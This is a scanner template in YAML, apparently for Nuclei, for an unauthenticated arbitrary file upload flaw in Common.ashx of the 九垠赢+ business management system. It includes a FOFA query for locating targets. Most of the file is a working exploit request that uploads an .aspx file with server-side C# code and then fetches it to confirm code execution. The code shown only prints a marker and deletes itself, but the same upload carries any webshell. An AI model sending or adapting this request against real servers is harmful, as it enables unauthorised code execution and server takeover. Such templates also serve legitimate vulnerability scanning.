http:
    - raw:
        - |
          POST /System/Common.ashx?type=savefile&path={{username}}.aspx HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
          Accept-Encoding: gzip, deflate
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
          Accept: */*
          Connection: close

          ------WebKitFormBoundaryFfJZ4PlAZBixjELj
          Content-Disposition: form-data; name="content";
          Content-Type: text/plain

          <%@Page Language="C#"%><%Response.Write("pboyjnnrfipmplsukdeczudsefxmywe");System.IO.File.Delete(Request.PhysicalPath);%>
          ------WebKitFormBoundaryFfJZ4PlAZBixjELj--
    - matchers:
        - part: body
          type: word
          words:
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /System/{{username}}.aspx HTTP/1.1
          Host: {{Hostname}}
id: jiuyinying-Common_ashx-File-upload
info:
    author: Superhero
    description: |-
        fofa: body="九垠赢+"
        九垠赢+商业管理系统 Common.ashx 存在文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 九垠赢+商业管理系统 Common.ashx 任意文件上传漏洞
    reference:
        - https://mp.weixin.qq.com/s/hagcU7qggatYuBGucZTbuQ?token=1497378487&lang=zh_CN
    severity: high
    tags: []
variables:
    username: '{{to_lower(rand_base(6))}}'
